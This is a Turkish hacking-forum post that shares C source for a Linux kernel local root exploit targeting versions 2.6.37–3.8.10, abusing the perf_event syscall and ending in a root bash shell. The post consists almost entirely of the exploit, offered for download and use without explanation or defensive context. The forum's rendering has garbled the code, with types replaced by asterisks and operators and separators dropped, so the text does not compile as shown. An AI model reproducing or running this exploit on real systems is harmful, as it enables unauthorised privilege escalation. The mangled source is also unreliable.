Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
2.6.37-3.8.10 Kernel Local Root Exploit
#1
PHP Kod:
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 */
 
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>
 
#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
 
**** fuck() {
        
int i,j,k;
        
uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
        
uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
        
uint64_t kbase = ((uint64_t)current)>>36;
        
uint32_t *fixptr = (*****) AB(1);
        *
fixptr = -1;
 
        for (
i=0i<4000i+=4) {
                
uint64_t *= (**** *)&current[i];
                
uint32_t *= (*****) p[0];
                if ((
p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
                for (
j=0j<20j++) { for (08k++)
                        if (((
uint32_t*)uids)[k] != t[j+k]) goto next;
                        for (
08i++) t[j+i] = 0;
                        for (
010i++) t[j+9+i] = -1;
                        return;
next:;          }
        }
}
 
**** 
sheep(uint32_t off) {
        
uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
        
int fd syscall(298buf0, -1, -10);
        
assert(!close(fd));
}
 
 
int     main() {
        
uint64_t  u,g,needlekbase, *puint8_t *code;
        
uint32_t *map5;
        
int i;
        
struct {
                
uint16_t limit;
                
uint64_t addr;
        } 
__attribute__((packed)) idt;
        
assert((map mmap((*****)BASESIZE30x320,0)) == (*****)BASE);
        
memset(map0SIZE);
        
sheep(-1); sheep(-2);
        for (
0SIZE/4i++) if (map[i]) {
                
assert(map[i+1]);
                break;
        }
        
assert(i<SIZE/4);
        
asm ("sidt %0" "=m" (idt));
        
kbase idt.addr 0xff000000;
        
getuid(); getgid();
        
assert((code = (*****)mmap((*****)kbaseKSIZE70x3200)) == (*****)kbase);
        
memset(code0x90KSIZE); code += KSIZE-1024memcpy(code, &fuck1024);
        
memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
                
printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
        
setresuid(u,u,u); setresgid(g,g,g);
        while (
j--) {
                
needle AB(j+1);
                
assert(memmem(code1024, &needle8));
                if (!
p) continue;
                *
j?((g<<32)|u):(idt.addr 0x48);
        }
        
sheep(-+ (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
        
asm("int $0x4");        assert(!setuid(0));
        return 
execl("/bin/bash""-sh"NULL);

Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 5 272 04-12-2016, Saat: 00:31
Son Yorum: DeaTHKNighT33
  Windows Server Root Kısa Videolu Anlatım KingSkrupellos 7 157 21-11-2016, Saat: 13:06
Son Yorum: Gardiyan
  vBulletin 5.1.2 SQL Injection Exploit Mrxxx 0 38 20-11-2016, Saat: 11:36
Son Yorum: Mrxxx
  Web hack - Exploit Kurena (Perl) archavin 33 3,508 14-07-2016, Saat: 19:58
Son Yorum: azeredhat
  PHP Scriptlerde SQLi Tespiti ve Exploit Etme H4Sec 113 5,685 02-03-2016, Saat: 16:13
Son Yorum: hasancaN
Anahtar Kelimeler

2.6.37-3.8.10 Kernel Local Root Exploit indir, 2.6.37-3.8.10 Kernel Local Root Exploit Videosu, 2.6.37-3.8.10 Kernel Local Root Exploit Online izle, 2.6.37-3.8.10 Kernel Local Root Exploit Bedava indir, 2.6.37-3.8.10 Kernel Local Root Exploit Yükle, 2.6.37-3.8.10 Kernel Local Root Exploit Hakkında, 2.6.37-3.8.10 Kernel Local Root Exploit Nedir, 2.6.37-3.8.10 Kernel Local Root Exploit Free indir, 2.6.37-3.8.10 Kernel Local Root Exploit Oyunu, 2.6.37-3.8.10 Kernel Local Root Exploit Download


1 Ziyaretçi